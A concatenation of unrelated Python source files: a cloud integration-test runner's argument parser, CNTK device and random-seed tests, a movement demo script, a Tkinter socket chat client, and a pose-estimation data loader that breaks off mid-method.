"custom_template_url": None,
"custom_awsbatch_template_url": None,
"custom_awsbatchcli_url": None,
"custom_ami": None,
"vpc_stack": None,
"cluster": None,
"no_delete": False,
"benchmarks": False,
"benchmarks_target_capacity": 200,
"benchmarks_max_time": 30,
}
def _init_argparser():
parser = argparse.ArgumentParser(
description="Run integration tests suite.", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"-f",
"--features",
help="Run only tests for the listed features. Prepending the not keyword to the feature name causes the "
"feature to be excluded.",
default=TEST_DEFAULTS.get("features"),
nargs="+",
)
parser.add_argument(
"-r", "--regions", help="AWS region where tests are executed.", default=TEST_DEFAULTS.get("regions"), nargs="+"
)
parser.add_argument(
"--credential",
action="append",
help="STS credential endpoint, in the format <region>,<endpoint>,<ARN>,<externalId>. "
"Could be specified multiple times.",
required=False,
)
parser.add_argument(
"-i", "--instances", help="AWS instances under test.", default=TEST_DEFAULTS.get("instances"), nargs="+"
)
parser.add_argument("-o", "--oss", help="OSs under test.", default=TEST_DEFAULTS.get("oss"), nargs="+")
parser.add_argument(
"-s", "--schedulers", help="Schedulers under test.", default=TEST_DEFAULTS.get("schedulers"), nargs="+"
)
parser.add_argument(
"-n", "--parallelism", help="Tests parallelism for every region.", default=TEST_DEFAULTS.get("parallelism")
)
parser.add_argument(
"--retry-on-failures",
help="Retry once more the failed tests after a delay of 60 seconds.",
action="store_true",
default=TEST_DEFAULTS.get("retry_on_failures"),
)
parser.add_argument(
"--dry-run",
help="Only show the list of tests that would run with specified options.",
action="store_true",
default=TEST_DEFAULTS.get("dry_run"),
)
parser.add_argument(
"--show-output",
help="Do not redirect tests stdout to file. Not recommended when running in multiple regions.",
action="store_true",
default=TEST_DEFAULTS.get("show_output"),
)
parser.add_argument(
"--sequential",
help="Run tests in a single process. When not specified tests will run concurrently in all regions.",
action="store_true",
default=TEST_DEFAULTS.get("sequential"),
)
parser.add_argument(
"--reports",
help="create tests report files. junitxml creates a junit-xml style report file. html creates an html "
"style report file. json creates a summary with details for each dimensions. cw publishes tests metrics into "
"CloudWatch",
nargs="+",
choices=["html", "junitxml", "json", "cw"],
default=TEST_DEFAULTS.get("reports"),
)
parser.add_argument(
"--cw-region", help="Region where to publish CloudWatch metrics", default=TEST_DEFAULTS.get("cw_region")
)
parser.add_argument(
"--cw-namespace",
help="CloudWatch namespace where to publish metrics",
default=TEST_DEFAULTS.get("cw_namespace"),
)
parser.add_argument("--key-name", help="Key to use for EC2 instances", required=True)
parser.add_argument("--key-path", help="Path to the key to use for SSH connections", required=True, type=_is_file)
parser.add_argument(
"--output-dir", help="Directory where tests outputs are generated", default=TEST_DEFAULTS.get("output_dir")
)
parser.add_argument(
"--custom-node-url", help="URL to a custom node package.", default=TEST_DEFAULTS.get("custom_node_url")
)
parser.add_argument(
"--custom-cookbook-url",
help="URL to a custom cookbook package.",
default=TEST_DEFAULTS.get("custom_cookbook_url"),
)
parser.add_argument(
"--custom-template-url", help="URL to a custom cfn template.", default=TEST_DEFAULTS.get("custom_template_url")
)
parser.add_argument(
"--custom-awsbatch-template-url",
help="URL to a custom awsbatch cfn template.",
default=TEST_DEFAULTS.get("custom_awsbatch_template_url"),
)
parser.add_argument(
"--custom-awsbatchcli-url",
help="URL to a custom awsbatch cli package.",
default=TEST_DEFAULTS.get("custom_awsbatchcli_url"),
)
parser.add_argument(
"--custom-ami", help="custom AMI to use for all tests.", default=TEST_DEFAULTS.get("custom_ami")
)
parser.add_argument("--vpc-stack", help="Name of an existing vpc stack.", default=TEST_DEFAULTS.get("vpc_stack"))
parser.add_argument(
"--cluster", help="Use an existing cluster instead of creating one.", default=TEST_DEFAULTS.get("cluster")
)
parser.add_argument(
"--no-delete",
action="store_true",
help="Don't delete stacks after tests are complete.",
default=TEST_DEFAULTS.get("no_delete"),
)
parser.add_argument(
"--benchmarks",
help="run benchmarks tests. This disables the execution of all tests defined under the tests directory.",
action="store_true",
default=TEST_DEFAULTS.get("benchmarks"),
)
parser.add_argument(
"--benchmarks-target-capacity",
help="set the target capacity for benchmarks tests",
default=TEST_DEFAULTS.get("benchmarks_target_capacity"),
type=int,
)
parser.add_argument(
"--benchmarks-max-time",
help="set the max waiting time in minutes for benchmarks tests",
default=TEST_DEFAULTS.get("benchmarks_max_time"),
type=int,
)
return parser
def _is_file(value):
if not os.path.isfile(value):
raise argparse.ArgumentTypeError("'{0}' is not a valid key".format(value))
return value
def _get_pytest_args(args, regions, log_file, out_dir):
pytest_args = ["-s", "-vv", "-l"]
if args.benchmarks:
pytest_args.append("--ignore=./tests")
pytest_args.append("--rootdir=./benchmarks")
pytest_args.append("--benchmarks-target-capacity={0}".format(args.benchmarks_target_capacity))
pytest_args.append("--benchmarks-max-time={0}".format(args.benchmarks_max_time))
else:
pytest_args.append("--rootdir=./tests")
pytest_args.append("--ignore=./benchmarks")
# Show all tests durations
pytest_args.append("--durations=0")
# Run only tests with the given markers
pytest_args.append("-m")
pytest_args.append(" or ".join(args.features))
pytest_args.append("--regions")
pytest_args.extend(regions)
pytest_args.append("--instances")
pytest_args.extend(args.instances)
pytest_args.append("--oss")
pytest_args.extend(args.oss)
pytest_args.append("--schedulers")
pytest_args.extend(args.schedulers)
pytest_args.extend(["--tests-log-file", "{0}/{1}".format(args.output_dir, log_file)])
pytest_args.extend(["--output-dir", "{0}/{1}".format(args.output_dir, out_dir)])
pytest_args.extend(["--key-name", args.key_name])
pytest_args.extend(["--key-path", args.key_path])
if args.credential:
pytest_args.append("--credential")
pytest_args.extend(args.credential)
if args.retry_on_failures:
# Rerun tests on failures for one more time after 60 seconds delay
pytest_args.extend(["--reruns", "1", "--reruns-delay", "60"])
if args.parallelism:
pytest_args.extend(["-n", args.parallelism])
if args.dry_run:
pytest_args.append("--collect-only")
if any(report in ["junitxml", "json", "cw"] for report in args.reports):
pytest_args.append("--junit-xml={0}/{1}/results.xml".format(args.output_dir, out_dir))
if "html" in args.reports:
pytest_args.append("--html={0}/{1}/results.html".format(args.output_dir, out_dir))
_set_custom_packages_args(args, pytest_args)
_set_custom_stack_args(args, pytest_args)
return pytest_args
def _set_custom_packages_args(args, pytest_args):
if args.custom_node_url:
pytest_args.extend(["--custom-node-package", args.custom_node_url])
if args.custom_cookbook_url:
pytest_args.extend(["--custom-chef-cookbook", args.custom_cookbook_url])
if args.custom_template_url:
pytest_args.extend(["--template-url", args.custom_template_url])
if args.custom_awsbatch_template_url:
pytest_args.extend(["--custom-awsbatch-template-url", args.custom_awsbatch_template_url])
if args.custom_awsbatchcli_url:
pytest_args.extend(["--custom-awsbatchcli-package", args.custom_awsbatchcli_url])
if args.custom_ami:
pytest_args.extend(["--custom-ami", args.custom_ami])
def _set_custom_stack_args(args, pytest_args):
if args.vpc_stack:
pytest_args.extend(["--vpc-stack", args.vpc_stack])
if args.cluster:
pytest_args.extend(["--cluster", args.cluster])
if args.no_delete:
pytest_args.append("--no-delete")
def _get_pytest_regionalized_args(region, args):
return _get_pytest_args(
args=args,
regions=[region],
log_file="{0}/{1}.log".format(LOGS_DIR, region),
out_dir="{0}/{1}".format(OUT_DIR, region),
)
def _get_pytest_non_regionalized_args(args):
return _get_pytest_args(
args=args, regions=args.regions, log_file="{0}/all_regions.log".format(LOGS_DIR), out_dir=OUT_DIR
)
def _run_test_in_region(region, args):
out_dir = "{base_dir}/{out_dir}/{region}".format(base_dir=args.output_dir, out_dir=OUT_DIR, region=region)
os.makedirs(out_dir, exist_ok=True)
# Redirect stdout to file
if not args.show_output:
sys.stdout = open("{0}/pytest.out".format(out_dir), "w")
pytest_args_regionalized = _get_pytest_regionalized_args(region, args)
with TemporaryDirectory() as temp_dir:
pytest_args_regionalized.extend(["--basetemp", temp_dir])
logger.info("Starting tests in region {0} with params {1}".format(region, pytest_args_regionalized))
pytest.main(pytest_args_regionalized)
def _make_logging_dirs(base_dir):
logs_dir = "{base_dir}/{logs_dir}".format(base_dir=base_dir, logs_dir=LOGS_DIR)
os.makedirs(logs_dir, exist_ok=True)
logger.info("Configured logs dir: {0}".format(logs_dir))
out_dir = "{base_dir}/{out_dir}".format(base_dir=base_dir, out_dir=OUT_DIR)
os.makedirs(out_dir, exist_ok=True)
logger.info("Configured tests output dir: {0}".format(out_dir))
def _run_parallel(args):
jobs = []
for region in args.regions:
p = multiprocessing.Process(target=_run_test_in_region, args=[region, args])
jobs.append(p)
p.start()
for job in jobs:
job.join()
def _run_sequential(args):
# Redirect stdout to file
if not args.show_output:
sys.stdout = open("{0}/{1}/pytest.out".format(args.output_dir, OUT_DIR), "w")
pytest_args_non_regionalized = _get_pytest_non_regionalized_args(args)
logger.info("Starting tests with params {0}".format(pytest_args_non_regionalized))
pytest.main(pytest_args_non_regionalized)
def main():
"""Entrypoint for tests executor."""
args = _init_argparser().parse_args()
logger.info("Starting tests with parameters {0}".format(args))
_make_logging_dirs(args.output_dir)
if args.sequential:
_run_sequential(args)
else:
_run_parallel(args)
logger.info("All tests completed!")
reports_output_dir = "{base_dir}/{out_dir}".format(base_dir=args.output_dir, out_dir=OUT_DIR)
if "junitxml" in args.reports:
generate_junitxml_merged_report(reports_output_dir)
if "json" in args.reports:
logger.info("Generating tests report")
generate_json_report(reports_output_dir)
if "cw" in args.reports:
logger.info("Publishing CloudWatch metrics")
generate_cw_report(reports_output_dir, args.cw_namespace, args.cw_region)
if __name__ == "__main__":
main()
|
misc_test.py
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
import numpy as np
import pytest
import cntk
from cntk.device import *
import sys
from multiprocessing import Process, Queue
cntk_py.always_allow_setting_default_device()
def is_locked_cross_process(queue, device_id):
device = cpu() if device_id < 0 else gpu(device_id)
queue.put(device.is_locked())
def is_locked(device):
q = Queue()
device_id = -1 if (device.type() == DeviceKind.CPU) else device.id();
p = Process(target=is_locked_cross_process, args=(q,device_id))
p.start()
p.join()
assert p.exitcode == 0
return q.get()
def test_callstack1():
with pytest.raises(ValueError) as excinfo:
cntk.device.gpu(99999)
assert '[CALL STACK]' in str(excinfo.value)
def test_callstack2():
with pytest.raises(ValueError) as excinfo:
cntk.io.MinibatchSource(cntk.io.CTFDeserializer("", streams={}))
assert '[CALL STACK]' in str(excinfo.value)
def test_cpu_and_gpu_devices():
device = cpu()
assert device.type() == DeviceKind.CPU
assert device.id() == 0
for i in range(len(all_devices()) - 1):
device = gpu(i)
assert device.type() == DeviceKind.GPU
assert device.id() == i
def test_all_devices():
assert len(all_devices()) > 0
assert cpu() in all_devices()
if (len(all_devices()) > 1):
assert gpu(0) in all_devices()
def test_gpu_properties():
for device in all_devices():
if (device.type() != DeviceKind.GPU):
continue
props = get_gpu_properties(device)
assert props.device_id == device.id()
assert props.cuda_cores > 0
assert props.total_memory > 0
assert props.version_major > 0
def _use_default_device(queue):
# use_default_device needs to be tested in isolation
# in a freshly created process environment.
device = use_default_device()
if (device.type() != DeviceKind.GPU):
queue.put(not is_locked(device))
else:
queue.put(is_locked(device))
def test_use_default_device():
# this will release any previous held device locks
try_set_default_device(cpu(), False)
q = Queue()
p = Process(target=_use_default_device, args=(q,))
p.start()
p.join()
assert p.exitcode == 0
assert q.get()
def test_set_cpu_as_default_device():
device = cpu()
assert not is_locked(device)
assert not try_set_default_device(device, True)
assert not is_locked(device)
assert try_set_default_device(device)
assert try_set_default_device(device, False)
assert not is_locked(device)
assert device == use_default_device()
def test_set_gpu_as_default_device():
if len(all_devices()) == 1:
return;
# this will release any previous held device locks
try_set_default_device(cpu(), False)
for i in range(len(all_devices()) - 1):
device = gpu(i)
assert try_set_default_device(device, False)
assert not is_locked(device)
assert device == use_default_device()
if not device.is_locked():
assert not is_locked(device)
assert try_set_default_device(device, True)
assert device == use_default_device()
assert is_locked(device)
def test_set_excluded_devices():
if len(all_devices()) == 1:
return;
assert try_set_default_device(cpu(), False)
assert try_set_default_device(gpu(0), False)
set_excluded_devices([cpu()])
assert not try_set_default_device(cpu(), False)
set_excluded_devices([])
assert try_set_default_device(cpu(), False)
def test_setting_trace_level():
from cntk.logging import TraceLevel, set_trace_level, get_trace_level
value = get_trace_level()
assert value == TraceLevel.Warning
for level in [TraceLevel.Info, TraceLevel.Error, TraceLevel.Warning]:
set_trace_level(level)
value = get_trace_level()
assert value == level
set_trace_level(level.value)
value = get_trace_level()
assert value == level
def get_random_parameter_value(initializer, seed=None):
init = initializer(scale = cntk.initializer.DefaultParamInitScale, seed=seed)
return cntk.ops.parameter(shape=(10,), init=init).value
def get_dropout_rng_seed(seed=None):
if (seed):
f = cntk.ops.dropout(0.5, seed=seed)
else:
f = cntk.ops.dropout(0.5)
return f.root_function.attributes['rngSeed']
def test_rng_seeding_in_parameter_initialization():
initializers = [
cntk.initializer.glorot_normal,
cntk.initializer.glorot_uniform,
cntk.initializer.he_normal,
cntk.initializer.he_uniform,
cntk.initializer.normal,
cntk.initializer.uniform,
cntk.initializer.xavier
]
for x in initializers:
cntk.cntk_py.reset_random_seed(1)
p1 = get_random_parameter_value(x)
p2 = get_random_parameter_value(x)
assert not np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(2)
p1 = get_random_parameter_value(x)
cntk.cntk_py.reset_random_seed(2)
p2 = get_random_parameter_value(x)
assert np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(3)
p1 = get_random_parameter_value(x, seed=123)
p2 = get_random_parameter_value(x, seed=123)
assert np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(4)
p1 = get_random_parameter_value(x, seed=123)
p2 = get_random_parameter_value(x, seed=456)
assert not np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(5)
cntk.cntk_py.set_fixed_random_seed(789)
p1 = get_random_parameter_value(x)
p2 = get_random_parameter_value(x)
assert np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(6)
cntk.cntk_py.set_fixed_random_seed(789)
p1 = get_random_parameter_value(x, seed=123)
p2 = get_random_parameter_value(x, seed=123)
assert np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(7)
cntk.cntk_py.set_fixed_random_seed(789)
p1 = get_random_parameter_value(x, seed=123)
p2 = get_random_parameter_value(x, seed=456)
assert not np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(8)
cntk.cntk_py.set_fixed_random_seed(789)
p1 = get_random_parameter_value(x)
cntk.cntk_py.set_fixed_random_seed(987)
p2 = get_random_parameter_value(x)
assert not np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(9)
cntk.cntk_py.set_fixed_random_seed(789)
p1 = get_random_parameter_value(x)
cntk.cntk_py.set_fixed_random_seed(987)
cntk.cntk_py.set_fixed_random_seed(789)
p2 = get_random_parameter_value(x)
assert np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(0)
def test_rng_seeding_in_dropout():
seed1 = get_dropout_rng_seed()
seed2 = get_dropout_rng_seed()
assert seed1 != seed2
seed1 = get_dropout_rng_seed(seed=123)
seed2 = get_dropout_rng_seed(seed=123)
assert seed1 == seed2 and seed1 == 123
cntk.cntk_py.set_fixed_random_seed(456)
seed1 = get_dropout_rng_seed()
seed2 = get_dropout_rng_seed()
assert seed1 == seed2 and seed1 == 456
cntk.cntk_py.reset_random_seed(789)
seed1 = get_dropout_rng_seed()
cntk.cntk_py.reset_random_seed(789)
seed2 = get_dropout_rng_seed()
assert seed1 == seed2 and seed1 == 789
cntk.cntk_py.reset_random_seed(0)
|
entitytest.py
|
#!/bin/env python3
from psydewalk.entity import *
from psydewalk.geo import Coordinate
from datetime import datetime
from threading import Thread
def wörkwörk(entity, dest):
start = datetime.now()
print('Start: ' + str(start))
entity.moveTo(dest)
end = datetime.now()
print('End: ' + str(end))
print('Duration: ' + str(end - start))
home = Coordinate(54.355420, 10.135980)
finance = Coordinate(54.355695, 10.131490)
speed = 25 / 3.6
dist = home.dist(finance)
print('distance: {0} m, speed: {1} m/s, duration: {2} s'.format(dist, speed, dist / speed))
entity = SmoothMovingEntity(home, speed)
Thread(target=wörkwörk, args=(entity,finance)).start()
sleep(2)
print('SPEED=2')
entity.setSpeed(2)
sleep(5)
print('SPEED=25')
entity.setSpeed(25)
|
client.py
|
"""Script for Tkinter GUI chat client."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import tkinter
def receive():
"""Handles receiving of messages."""
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
msg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
msg = my_msg.get()
my_msg.set("") # Clears input field.
client_socket.send(bytes(msg, "utf8"))
if msg == "{quit}":
client_socket.close()
top.quit()
def on_closing(event=None):
"""This function is to be called when the window is closed."""
my_msg.set("{quit}")
send()
top = tkinter.Tk()
top.title("Chatter")
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # For the messages to be sent.
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
#----Now comes the sockets part----
HOST = input('Enter host: ')
PORT = input('Enter port: ')
if not PORT:
PORT = 33000
else:
PORT = int(PORT)
BUFSIZ = 1024
ADDR = (HOST, PORT)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop() # Starts GUI execution.
|
dataloader.py
|
import os
import torch
from torch.autograd import Variable
import torch.utils.data as data
import torchvision.transforms as transforms
from PIL import Image, ImageDraw
from SPPE.src.utils.img import load_image, cropBox, im_to_torch
from opt import opt
from yolo.preprocess import prep_image, prep_frame, inp_to_image
from pPose_nms import pose_nms, write_json
from matching import candidate_reselect as matching
from SPPE.src.utils.eval import getPrediction, getMultiPeakPrediction
from yolo.util import write_results, dynamic_write_results
from yolo.darknet import Darknet
from tqdm import tqdm
import cv2
import json
import numpy as np
import sys
import time
import torch.multiprocessing as mp
from multiprocessing import Process
from multiprocessing import Queue as pQueue
from threading import Thread
# import the Queue class from Python 3
if sys.version_info >= (3, 0):
from queue import Queue, LifoQueue
# otherwise, import the Queue class for Python 2.7
else:
from Queue import Queue, LifoQueue
if opt.vis_fast:
from fn import vis_frame_fast as vis_frame
else:
from fn import vis_frame
class Image_loader(data.Dataset):
def __init__(self, im_names, format='yolo'):
super(Image_loader, self).__init__()
self.img_dir = opt.inputpath
self.imglist = im_names
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
self.format = format
def getitem_ssd(self, index):
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im = Image.open(im_name)
inp = load_image(im_name)
if im.mode == 'L':
im = im.convert('RGB')
ow = oh = 512
im = im.resize((ow, oh))
im = self.transform(im)
return im, inp, im_name
def getitem_yolo(self, index):
inp_dim = int(opt.inp_dim)
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im, orig_img, im_dim = prep_image(im_name, inp_dim)
#im_dim = torch.FloatTensor([im_dim]).repeat(1, 2)
inp = load_image(im_name)
return im, inp, orig_img, im_name, im_dim
def __getitem__(self, index):
if self.format == 'ssd':
return self.getitem_ssd(index)
elif self.format == 'yolo':
return self.getitem_yolo(index)
else:
raise NotImplementedError
def __len__(self):
return len(self.imglist)
class ImageLoader:
def __init__(self, im_names, batchSize=1, format='yolo', queueSize=50):
self.img_dir = opt.inputpath
self.imglist = im_names
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
self.format = format
self.batchSize = batchSize
self.datalen = len(self.imglist)
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store data
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if self.format == 'ssd':
if opt.sp:
p = Thread(target=self.getitem_ssd, args=())
else:
p = mp.Process(target=self.getitem_ssd, args=())
elif self.format == 'yolo':
if opt.sp:
p = Thread(target=self.getitem_yolo, args=())
else:
p = mp.Process(target=self.getitem_yolo, args=())
elif self.format == 'mtcnn':
if opt.sp:
p = Thread(target=self.getitem_mtcnn, args=())
else:
p = mp.Process(target=self.getitem_mtcnn, args=())
else:
raise NotImplementedError
p.daemon = True
p.start()
return self
def getitem_ssd(self):
length = len(self.imglist)
for index in range(length):
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im = Image.open(im_name)
inp = load_image(im_name)
if im.mode == 'L':
im = im.convert('RGB')
ow = oh = 512
im = im.resize((ow, oh))
im = self.transform(im)
while self.Q.full():
time.sleep(2)
self.Q.put((im, inp, im_name))
def getitem_yolo(self):
for i in range(self.num_batches):
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
inp_dim = int(opt.inp_dim)
im_name_k = self.imglist[k].rstrip('\n').rstrip('\r')
im_name_k = os.path.join(self.img_dir, im_name_k)
img_k, orig_img_k, im_dim_list_k = prep_image(im_name_k, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(im_name_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list_ = im_dim_list
while self.Q.full():
time.sleep(2)
self.Q.put((img, orig_img, im_name, im_dim_list))
def getitem_mtcnn(self):
"""Same as getitem_yolo()"""
for i in range(self.num_batches):
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
inp_dim = int(opt.inp_dim)
im_name_k = self.imglist[k].rstrip('\n').rstrip('\r')
im_name_k = os.path.join(self.img_dir, im_name_k)
try:
img_k, orig_img_k, im_dim_list_k = prep_image(im_name_k, inp_dim)
except BaseException as e:
print(im_name_k, e)
continue
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(im_name_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list_ = im_dim_list
while self.Q.full():
time.sleep(2)
self.Q.put((img, orig_img, im_name, im_dim_list))
def getitem(self):
return self.Q.get()
def length(self):
return len(self.imglist)
def len(self):
return self.Q.qsize()
class VideoLoader:
def __init__(self, path, batchSize=1, queueSize=50):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.path = path
self.stream = cv2.VideoCapture(path)
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
self.batchSize = batchSize
self.datalen = int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def length(self):
return self.datalen
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
stream = cv2.VideoCapture(self.path)
assert stream.isOpened(), 'Cannot capture source'
for i in range(self.num_batches):
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
inp_dim = int(opt.inp_dim)
(grabbed, frame) = stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.Q.put((None, None, None, None))
print('===========================> This video get '+str(k)+' frames in total.')
sys.stdout.flush()
return
# process and add the frame to the queue
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(str(k)+'.jpg')
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list_ = im_dim_list
while self.Q.full():
time.sleep(2)
self.Q.put((img, orig_img, im_name, im_dim_list))
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def getitem(self):
# return next frame in the queue
return self.Q.get()
def len(self):
return self.Q.qsize()
class DetectionLoader:
def __init__(self, dataloder, batchSize=1, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
# self.det_inp_dim = int(self.det_model.net_info['height'])
self.det_inp_dim = int(opt.inp_dim)
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stopped = False
self.dataloder = dataloder
self.batchSize = batchSize
self.datalen = self.dataloder.length()
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
# keep looping the whole dataset
from mtcnn.mtcnn import MTCNN
detector = MTCNN()
for i in range(self.num_batches):
img, orig_img, im_name, im_dim_list = self.dataloder.getitem()
if img is None:
self.Q.put((None, None, None, None, None, None, None))
return
with torch.no_grad():
if self.dataloder.format == 'yolo':
# Human Detection
img = img.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction, opt.confidence,
opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
elif self.dataloder.format == 'mtcnn':
# Face detection
imgs_np = img.float().mul(255.0).cpu().numpy()
imgs_np = np.squeeze(imgs_np, axis=0)
imgs_np = np.transpose(imgs_np, (1, 2, 0))
dets = detector.detect_faces(imgs_np)
fac_det = []
for det in dets:
fac_det.append([0, det["box"][0], det["box"][1],
det["box"][0] + det["box"][2], det["box"][1] + det["box"][3],
det["confidence"], 0.99, 0])
dets = torch.tensor(fac_det)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(orig_img)):
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
continue
dets = dets.cpu()
im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
for k in range(len(orig_img)):
boxes_k = boxes[dets[:,0]==k]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
continue
inps = torch.zeros(boxes_k.size(0), 3, opt.inputResH, opt.inputResW)
pt1 = torch.zeros(boxes_k.size(0), 2)
pt2 = torch.zeros(boxes_k.size(0), 2)
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], boxes_k, scores[dets[:,0]==k], inps, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class DetectionProcessor:
def __init__(self, detectionLoader, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.detectionLoader = detectionLoader
self.stopped = False
self.datalen = self.detectionLoader.datalen
# initialize the queue used to store data
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = pQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
# keep looping the whole dataset
for i in range(self.datalen):
with torch.no_grad():
(orig_img, im_name, boxes, scores, inps, pt1, pt2) = self.detectionLoader.read()
if orig_img is None:
self.Q.put((None, None, None, None, None, None, None))
return
if boxes is None or boxes.nelement() == 0:
while self.Q.full():
time.sleep(0.2)
self.Q.put((None, orig_img, im_name, boxes, scores, None, None))
continue
inp = im_to_torch(cv2.cvtColor(orig_img, cv2.COLOR_BGR2RGB))
